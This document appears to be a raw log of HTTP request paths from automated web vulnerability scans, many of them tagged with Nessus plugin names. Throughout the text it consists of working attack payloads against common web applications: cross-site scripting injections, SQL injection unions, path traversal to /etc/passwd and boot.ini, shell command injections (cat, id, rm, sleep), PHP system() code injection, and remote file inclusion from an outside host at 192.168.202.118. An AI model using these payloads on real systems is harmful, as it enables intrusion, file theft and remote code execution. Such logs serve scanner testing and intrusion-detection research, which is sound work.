/etc/passwd\\x00|\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\\x00\n/m5103snj.cfc?<script>cross_site_scripting.nasl</script>\n/oie504mr.exe?<script>document.cookie=\"testtpby=7052;\"</script>\n/scripts/mail.cgi\n/iv5vkgam.kspx?<script>document.cookie=\"testfosd=94;\"</script>\n/?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/includes/footer.php?template=../../admin/images/admin_headbg.gif\\x00\n/n1afe1y6.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/7dbjwpw6.do?<script>cross_site_scripting.nasl</script>\n/main.php?logout='\\x0auname >q63177134 #\n/examples/jsp/num/index.pl/homels?func=add;class=webgui::asset::wobject::article;print `id`;\n/main.php?logout=\"&ver&rem\\x09\n/cacti/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/<script>document.cookie=\"testqppc=8767;\"</script>\n/examples/jsp/jsp2/el/doc/index.php?s=/etc/passwd\\x00\n/fcgi-bin/msmmask.exe?mask=/junk334\n/search_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/javascript/card.exe\n/manager/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/scripts/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331908736,1948616015 -- \n/eei78ore.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/1qwv2p5p.dll?<script>document.cookie=\"testvqcy=252;\"</script>\n/h21y8w52.exe?<script>cross_site_scripting.nasl</script>\n/javascript/.htaccess.sfish/sfish>'>\"><sfish></sfish>\n/tuwjta1w.kspx?<script>document.cookie=\"testpokn=7494;\"</script>\n/examples/servlets/servlet/sawmillcl.exe?ho+{complete_version}\n/examples/jsp/num/zpanel.php?page=/etc/passwd\\x00\n/ybz5rz7a.mscgi?<script>document.cookie=\"testsbvw=6289;\"</script>\n<script>document.cookie=\"testfosd=94;\"</script>\n/help.php?q=\"del\\xa0q74458178&rem\\xa0\n/login.php?req=\"><script>alert('testlink_login_req_param_xss.nasl-1331908833')</script>\n/help.php?q=\";rm\\x09q77596328\\x09#\n/javascript/.htaccess.sfish/\\\\'\\\\\"\n/jdx255ea.aspx?<meta http-equiv=set-cookie content=\"testziyq=5055\">\n/scripts/unlg1.2\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/tmcrsoeqnm0+>+/dev/null+&'); function v\n/uc3w3bdi.jsp?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/lsoix5h3.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/dda2qr7j.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/manager/sendtemp.pl?templ=../../../../../etc/passwd\n/en-us/oie504mr.htm?<script>document.cookie=\"testtpby=7052;\"</script>\n/seventh goddess' day/\n/top.php?stuff=\"\\x0ddel q38313114 #\n/examples/jsp/colors/cal_event.php?id=1' union select 1,2,'calendarix_id_sql_injection.nasl',4,5,6,7,8,9,10,11,12,13--\n/using logon scripts figure 21102332757725/\n/examples/jsp/jsp2/jspx/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/cgi/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n<script>document.cookie=\"testknim=9383;\"</script>\n/top.php?stuff=\"&ver&rem\\x09\n/examples/jsp/checkboxsearch-results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/wps/wcm/webinterface/login/login.jsp?\"><script>alert(\"ibm_login_qs_xss.nasl-1331905212\")</script>\n/169okeyj.aspx?<script>document.cookie=\"testxeoi=3573;\"</script>\n/en-us/account/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/examples/jsp/jsp2/jspx/remindpasswd\n/?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/jujgxwav.cfm?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/9ko6m4c8.x?<script>document.cookie=\"testylik=3403;\"</script>\n/um7xpn15.jsp?<meta http-equiv=set-cookie content=\"testotoy=6142\">\n/help.php?q=\"|ping,-w,10000,-n,1,4.3.2.1|rem,\n/default.asp?msg=<script>alert(\"411656083443\")</script>\n//</p><body><script src=http://www.example.com/test?rnd=q48487192></script><p>\n/examples/servlets/servlet/topic.php?tid='select\n/phpmyadmin/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\\x00\n/scripte/\n/index.php?action=storenew&username=<script>alert('vulnerable')</script>\n/3j8echh0.php3?<meta http-equiv=set-cookie content=\"testfuqi=4189\">\n/rv98iwjp.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/script/ident/identification.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/examples/jsp/jsp2/jspx/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/g8nu2yy7.cgi?<script>cross_site_scripting.nasl</script>\n/qhvu0pdg.html?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/javascript/guestbook.exe\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919142&lang_crm=../../vtigerservice.php\\x00\n/javascript/document.rhtml\n/fcgi-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/main.php?stuff=ver\\x0c>q99272474&rem\\x0c\n/pms.php?action=send&recipient=destinataire&subject=happy&posticon=javascript:alert('vulnerable')&mode=0&message=hello\n/help.php?q=\"&ver\\x0c>q93118475&rem\\x0c\n/javascript/computers.exe\n/jnt3f86c.html?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/ydexw8by.aspx?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/help.php?q=\";del q25549328 #\n/?<script>document.cookie=\"testylik=3403;\"</script>\n/j2kdmfw4.asp?<script>cross_site_scripting.nasl</script>\n/xsqln7eb.aspx?<script>document.cookie=\"testpcbb=9254;\"</script>\n/subscriptions.temp\n/scripts/tiki-index.php\n/7dbjwpw6.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&rm\\x09q45798999&rem\\x09\n/cgi-bin/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/b1q8bywu.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fpnpp5zg.x?<script>document.cookie=\"testyias=101;\"</script>\n/main.php?stuff=\"|ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/h21y8w52.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=ping;-w;10000;-n;1;4.3.2.1&rem;\n/u95h6ymu.cfc?<meta http-equiv=set-cookie content=\"testkhwc=4028\">\n/pxagj7n7.mscgi?<script>cross_site_scripting.nasl</script>\n/javascript/demos.exe\n/cgi-bin/gw5/gwweb.exe?get-context&htmlver=aaa\n/zroo33l4.x?<script>document.cookie=\"testiklc=904;\"</script>\n/examples/jsp/jsp2/el/calendar_admin.pl?config=|cat /etc/passwd|\n/apavxugx.nsf?<meta http-equiv=set-cookie content=\"testdnbh=5237\">\n/h5sc3gxy.cfc?<script>cross_site_scripting.nasl</script>\n/ewc3rz1l.jsp?<script>document.cookie=\"testkgqo=204;\"</script>\n/examples/jsp/num/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/fnwhrxyd.aspx?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/sgdynamo.exe?htname=sgdynamo.exe\n/descriptor/\n/9kr0ih0v.cfm?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/jw64yq8u.nsf?<script>document.cookie=\"testylfu=1313;\"</script>\n..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/rpc/..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c..\\xc1\\x9c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/.passwd.shtml\n/cgi-bin/14all.cgi?cfg=../../../../../../../../etc/passwd\n/s7qus4g3.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iajtej82.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/main.cgi?board=free_board&command=down_load&filename=/../../../../../../../../etc/passwd\n/examples/jsp/num/bb-hist.sh?histfile=../../../../../etc/passwd\n/hrttz9fj.aspx?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331923205,4,5\n/javascript/domain.exe\n/copying/</p><body><script/src=\"http://www.example.com/test?rnd=q66174257\"></script><p>\n/examples/jsp/error/search.cgi?..\\..\\..\\..\\..\\..\\winnt\\win.ini\n/examples/jsp/num/lang/lang.php?lang_path=/etc/passwd\\x00\n/xlj7h65o.kspx?<script>document.cookie=\"testtbbe=856;\"</script>\n/examples/jsp/checkbox/index.php?configfile=../../../../../../../../../etc/passwd\n/javascript/artwork.exe\n/main.php?logout=\"del;q16377729&rem;\n/d765w06j.php3?<script>cross_site_scripting.nasl</script>\n/en-us/odzk29aa.php3?<script>document.cookie=\"testtfvh=2141;\"</script>\n/ju0u7kfo.cgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/num/add_url.htm?node=<script>alert('xss')</script>\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331904464,4--&blog=1\n/recordings/k/home?dir=/&file=../../../../../../../../../../../../etc/passwd&lang=kor\n/site/' union all select filetoclob('/etc/passwd','server')::html,0 from sysusers where username=user --/.html\n/e9rx3ya4.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/n1afe1y6.pl?<script>cross_site_scripting.nasl</script>\n/modules.php?name=downloads&d_op=viewdownloaddetails&lid=02&ttitle=<script>alert('vulnerable')</script>\n/main.php?logout=\"&ping;-w;10000;-n;1;1.2.3.4&rem;\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/ghl9il??\n/index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\n/perlscript/\n/xfkun1ku.kspx?<script>cross_site_scripting.nasl</script>\n/javascript/signup.exe\n/lsoix5h3.aspx?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/rot13sj.cgi?/etc/passwd\n/82q7ywa8.jspa?<script>document.cookie=\"testpwew=1315;\"</script>\n/jackrabbit/search.jsp?q=%\"<script>alert(1332010391)</script>\n/scripts/eezuu7xc7ge3.html\n/azcrfs8d.do?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/?<script>document.cookie=\"testxqrn=4654;\"</script>\n/subscriptions.asp\n/scripts/nckowqpd4zng.html\n/6wb70v0b.jsp?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=;uname >q28712723 #\n/main.php?logout=\"&del\\xa0q18437972&rem\\xa0\n/qhvu0pdg.idc?<meta http-equiv=set-cookie content=\"testchuc=2100\">\n/main.php?logout=\"ver >q41454446&rem \n/recordings/newsdesk.cgi?t=../../../../../../etc/passwd\n/examples/jsp/cal/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/en-us/w4996nr0.php3?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/examples/jsp/jsp2/el/config.php?returnpath=/etc/passwd\\x00\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331908811\n/examples/jsp/num/index.php?cid='\n/nyvbv05h.mscgi?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/main.php?stuff=\\x0auname\\x09>q85159998\\x09#\n/examples/jsp/num/texis.exe/nessus\n/javascript/.passwd.asp\n/index.php?op=default&date=200607' union select 1,166144719,1,1,1,1,1,1,1,1--&blogid=1\n/disablewindowsscriptinghostwsh/\n/main.php?logout=\"|sleep 10 #\n/cgi-bin/bslist.cgi?email=x;ls\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+02+00+00+00+18+00+00+00+00+00+00+00+00+00+00+00+00+00+00+40+00+00+c0+00++>>esbq\n/esmozg5d.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/wwwstats.exe\n/n1afe1y6.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/vmi8bb12.jsp?<meta http-equiv=set-cookie content=\"testlerc=2575\">\n/main.php?stuff='uname >q94914736 #\n/examples/jsp/checkbox/showcat.php?cat=1'\n/downloads/pafiledb.php?action=download&id=4?\\\"&lt;script&gt;alert('vulnerable')&lt;/script&gt;\\\"\n/scripts/eezuu7xc7ge3.pl\n/examples/jsp/jsp2/el/survey.inc.php?path=/etc/passwd\\x00\n/ny1b3qq4.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/document.meta\n/scripts/zq9frlz6fcfp.shtml\n/scripts/wx4z4gedhl0l.php\n/scripts/logbook.pl?file=../../../../../../../../../../bin/cat /etc/passwd\\x00|\n/yver8r9o.jsp?<script>cross_site_scripting.nasl</script>\n/xlj7h65o.aspx?<script>document.cookie=\"testtbbe=856;\"</script>\n/top.php?stuff=';sleep 8 #\n/examples/jsp/jsp2/jspx/nph-mr.cgi?do=loginhelp&configlanguage=../../../../../../../etc/passwd\\x00\n/examples/jsp/cal/print.php?what=article&id='\n/nyvbv05h.html?<script>document.cookie=\"testftxz=5980;\"</script>\n/g8nu2yy7.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/jsp2/el/detail.asp?nchannel='1\n/cacti/ftp/ftp.pl?dir=../../../../../../etc\n/examples/jsp/num/include/sql.php?include_path=/etc/passwd\\x00\n/main.php?stuff=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/b5xdqgz2.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\\x0duname\\x09>q22282418\\x09#\n/qb2xy9aw.aspx?<script>cross_site_scripting.nasl</script>\n/606wkcop.idc?<script>cross_site_scripting.nasl</script>\n/i2n4v4rl.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/mv8wxfy9.cfm?<script>document.cookie=\"testrhbc=8184;\"</script>\n/vhzmaia2.cfc?<script>document.cookie=\"testkogj=3979;\"</script>\n/i686v90l.php?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/default.asp?msg=<script>alert(\"411705577537\")</script>\n/recordings/zpanel.php?page=/etc/passwd\\x00\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331909312',null,null,null,null --\n/9ko6m4c8.fts?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/en-us/account/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/cgi-bin/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/javascript/~root.exe\n/en-us/oie504mr.php3?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/javascript/xhtml.exe\n/javascript/htpasswd.ppt\n/codes-scripts/\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\\x00\n/scriptpath/footers.php?tinybb_footers=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/top.php?stuff=&ver\\xa0>q27771129&rem\\xa0\n/ripley's/\n/1r8cfrlf.php3?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/top.php?stuff=\"del;q63898211&rem;\n/examples/jsp/colors/error.php?selected_theme=<script>alert(uebimiau_selected_theme_xss.nasl)</script>\n/j4drbkil.cfc?<script>cross_site_scripting.nasl</script>\n/init.php?scriptpath=http://192.168.202.118:8080/2aibfaczmac8??\n/phpmyadmin/remindpasswd\n/album.php?albumid=1'413976083537\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919224,4,5\n/examples/jsp/colors/lang/lang.php?lang_path=/etc/passwd\\x00\n/lsoix5h3.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/about/frmabout.aspx\n/citrix/accessplatform/auth/clientscripts/login.js\n/scripts/_xuzlr7swn95.html\n/hrttz9fj.do?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/s7qus4g3.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/vvh_tajyleqq.asp\n/servlets/msgpage?action=badlogin&msg=<script>alert('vulnerable')</script>\n/pam_passwdqc/\n/examples/jsp/jsp2/jspx/more.php?id=1'\n/cacti/help.php?section='qualiteam_xcart_sql_xss.nasl\n/mv8wxfy9.jspa?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/examples/jsp/sessions/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/javascript/camel.exe\n/main.php?logout='\\x0duname\\x09>q42114986\\x09#\n/sturgeon's-law/\n/opensiteadmin/scripts/classes/filter.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\\x00\n/javascript/solaris.exe\n/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/en-us/odzk29aa.fts?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/6qbynt4f.htm?<script>cross_site_scripting.nasl</script>\n/x2gyorli.jspa?<script>document.cookie=\"testwhac=3130;\"</script>\n/scripts/hw3.php?daysonly=0).system(id).(\n/scripts/sitemap.xml\n/newsarchive.php?path_to_script=http://192.168.202.118:8080/moclyxlwqyfjnp??&cmd=ls\n/javascript/lang.exe\n/main.php?stuff=\"&ping,-w,7000,-n,1,4.3.2.1&rem,\n/mitch's book1159301465750/\n/m2fpztty.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fnwhrxyd.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/eg2u8pbv.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"ping,-w,8000,-n,1,4.3.2.1&rem,\n/examples/jsp/jsp2/jspx/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/i7prbs22.dll?<script>document.cookie=\"testjnre=7328;\"</script>\n/scripts/check_user_id.php?user_id=<script>foo</script>\n/nyjgaorz.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/links_add_form.asp\n/help.php?q=';rm\\x09q85144243\\x09#\n/whycan'tifindajob/\n/u95h6ymu.fts?<script>document.cookie=\"testkhwc=4028;\"</script>\n/subscriptions.tar.gz\n/0qhcnefz.exe?<script>cross_site_scripting.nasl</script>\n/b1q8bywu.exe?<script>cross_site_scripting.nasl</script>\n/xml_scripting/\n/ldap/cgi-bin/ldacgi.exe?action=<script>alert(\\\"vulnerable\\\")</script>\n<meta http-equiv=set-cookie content=\"testlihk=7070\">\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+d7+93+ff+d7+95+83+c4+10+58+5a+59+53+55+50+8b+ec+50+57+52+56+6a+06+5a+eb+0e++>>esbq\n/examples/jsp/jsp2/jspx/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/javascript/page1.exe\n/en-us/h5sc3gxy.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&del,q93432438&rem,\n/scgi-bin/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/en-us/7o5qp766.dll?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"ping -w 10000 -n 1 1.2.3.4|rem \n/scripts/advsearch_h.asp\n/examples/jsp/checkbox/pfdispaly.cgi?../../../../../../etc/passwd\n/manager/index.php?user_langue=../../../../../../../../../../etc/passwd\n/help.php?q=\"&ver\\xa0>q59981564&rem\\xa0\n/help.php?q=ping;-w;7000;-n;1;1.2.3.4&rem;\n/javascript/htpasswd\n/_mem_bin/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/javascript/crypt.exe\n/main.php?logout=\"ping\\x09-w\\x0911000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/examples/jsp/checkbox/www/delivery/fc.php?max_type=../../../../../../../../../../etc/passwd\\x00\n/ywaxntrx.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"\\x0dsleep 10 #\n/nyvbv05h.idc?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/i7prbs22.asp?<meta http-equiv=set-cookie content=\"testjnre=7328\">\n/main.php?logout=\"\\x0dsleep 10 #\n/en-us/<script>cross_site_scripting.nasl</script>.dll\n/recordings/contrib/forms/evaluation/c_formevaluation.class.php?fileroot=/etc/passwd\\x00\n/examples/jsp/cal/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/<script>document.cookie=\"testsbvw=6289;\"</script>\n/o35zot2r.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/index.php?template=../../../loudblog/custom/config.php\\x00\n/top.php?stuff=\"&ping\\x09-w\\x099000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/scripts/vhost.php?action=logout&time=1331918957\n/j2kdmfw4.exe?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs\" and sleep(4)=\"\n/ghswfouu.asp?<script>document.cookie=\"testsqmm=5713;\"</script>\n/examples/jsp/checkbox/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/examples/jsp/error/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/javascript/poi.exe\n/scripts/t99iadgtkf9h.php3\n/cgi-bin/webplus.exe?script=webplus_install_path.nasl\n/recordings/sgdynamo.exe?htname=<script>foo</script>\n/fmnveedu.cfc?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/h5i6crm3.x?<script>document.cookie=\"testlihk=7070;\"</script>\n/t578vqea.exe?<script>document.cookie=\"testsory=7676;\"</script>\n/manager/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331904454,472430861 -- \n/?<script>document.cookie=\"testgjbe=8505;\"</script>\n/uc3w3bdi.nsf?<meta http-equiv=set-cookie content=\"testxllt=9940\">\n/scripts/index.php?template=../../../loudblog/custom/config.php\\x00\n/examples/jsp/jsp2/jspx/ion-p.exe?page=../../../../../etc/passwd\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/fhhqvtjwvv.sh+>+/dev/null+&').\"]=1\n/iktok2bw.php?<script>cross_site_scripting.nasl</script>\n/cgibin/msmmask.exe?mask=/junk334\n/top.php?stuff=\"&ver\\x0c>q43992942&rem\\x0c\n/5o9zq43e.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=&ver;>q31933452&rem;\n/examples/servlets/servlet/include/error/autherror.cfm?errorcode=1&ftvar_linkp=\"></a><script>alert('fusetalk_mult_xss.nasl')</script><a href=\"\n/examples/jsp/num/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/category.php?id='411895577604\n/cgi-bin/faxsurvey?cat /etc/passwd\n/top.php?stuff=\"ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/cacti/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/cgi-914/cgi-test.exe\n/examples/jsp/checkbox/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/examples/jsp/jsp2/jspx/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/j734qobz.jsp?<script>cross_site_scripting.nasl</script>\n/cgi-bin/install.php?newlang=../../cpg_error.log\\x00\n/javascript/texis.exe\n/i2n4v4rl.cfc?<script>cross_site_scripting.nasl</script>\n/7o5qp766.jsp?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/index.php?template=../../../loudblog/custom/config.php\\x00\n/addvip.php?msetstr[\"progsdir\"]=http://192.168.202.96:8080/no4ghqiguzhst?\n/g3w7y7u5.do?<meta http-equiv=set-cookie content=\"testbfpq=3326\">\n/sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>\n/9ko6m4c8.cfc?<script>document.cookie=\"testylik=3403;\"</script>\n/en-us/n9xlumt5.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/javascript/.passwd.rar\n/top.php?stuff=\"ver >q61611865&rem \n/?<script>document.cookie=\"testxllt=9940;\"</script>\n/javascript/part.exe\n/iajtej82.idc?<script>cross_site_scripting.nasl</script>\n/main.php?logout=\"ver\\x0c>q37726783&rem\\x0c\n/en-us/account/awstatstotals.php?sort=\"].passthru('id').exit().$a[\"\n/zmvq66jy.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/jnv890lt.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/include/doc/get_image.php?lang=en&img=../../../../../../../../../../etc/passwd\n/manager/directory.php?dir=;cat /etc/passwd\n/scripts/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331919198\n/iktok2bw.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/h4bi26jd.do?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/examples/jsp/checkbox/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/fo564rei.pl?<script>cross_site_scripting.nasl</script>\n/recordings/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/tuwjta1w.cfc?<script>document.cookie=\"testpokn=7494;\"</script>\n/examples/jsp/jsp2/jspx/lang/index.php?file=/etc/passwd\n/ddoworrl.asp?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/examples/jsp/jsp2/jspx/topic.php?tid='select\n/jnt3f86c.exe?<script>document.cookie=\"testcmax=9270;\"</script>\n/dda2qr7j.php3?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&del\\x0cq57632929&rem\\x0c\n/emailfriend/emailnews.php?id=\\\"<script>alert(document.cookie)</script>\n/javascript/setting.exe\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/7uz3ok60.do?<script>cross_site_scripting.nasl</script>\n/yver8r9o.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=;rm q35486244 #\n/cabela's african safari100 mb/\n/en-us/oie504mr.cgi?<script>document.cookie=\"testtpby=7052;\"</script>\n/dir_thatware/config.php?root_path=http://192.168.202.118:8080/moclyxlwqyfjnp?'\n/examples/jsp/cal/listrec.pl?app=qmh-news&template=;ls /etc|\n/j4oqyvga.x?<script>cross_site_scripting.nasl</script>\n/javascript/saved.exe\n/clinton's_biography/\n/?<script>document.cookie=\"testsory=7676;\"</script>\n/examples/jsp/num/core/editor.php?editor_insert_bottom=/etc/passwd\n/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/j4drbkil.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/1332008317-ror_session_fixation.nasl\n/cgi-bin/index.php?src=1&_common=1&time=1331904242&action=show_view&module=calendarmodule&view=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/sessions/calendar.php?serverpath=/etc/passwd\\x00\n/programdescription/\n/examples/servlets/servlet/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/vwmg565s.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\";sleep\\x0911\\x09#\n/manager/index.php?gadget=glossary&action=view&term=<script>alert('jaws_xss.nasl');</script>\n/examples/jsp/error/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/phpmyadminmultihtml.pl?multi=/etc/passwd\\x00html\n/?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/scripts/tomcat_proxy_directory_traversal.nasl1331919001\n/phpmyadmin/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/en-us/fo564rei.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/myfaces.exe\n/javascript/sales.exe\n/7o5qp766.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/quickstore.cgi?nessus&template=../../../../../../../../../../etc/passwd\\x00html\n/rv98iwjp.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/secure.php?cfgprogdir=/etc/passwd\\x00\n/cgi-bin/opendir.php?/etc/passwd\n/examples/jsp/jsp2/jspx/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n/recordings/webdist.cgi?distloc=;id\n/fa8p8lr8.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/fake.cgi?arg=/dir/../../../../../../etc/passwd\n/subscription2/\n/examples/jsp/checkbox/search.php?searchstring=<script>foo</script>\n/scripter/\n/javascript/recharge.exe\n/ddoworrl.php?<meta http-equiv=set-cookie 